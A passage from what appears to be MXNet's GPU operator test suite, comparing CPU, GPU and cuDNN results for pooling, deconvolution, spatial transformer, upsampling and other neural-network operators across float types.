sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
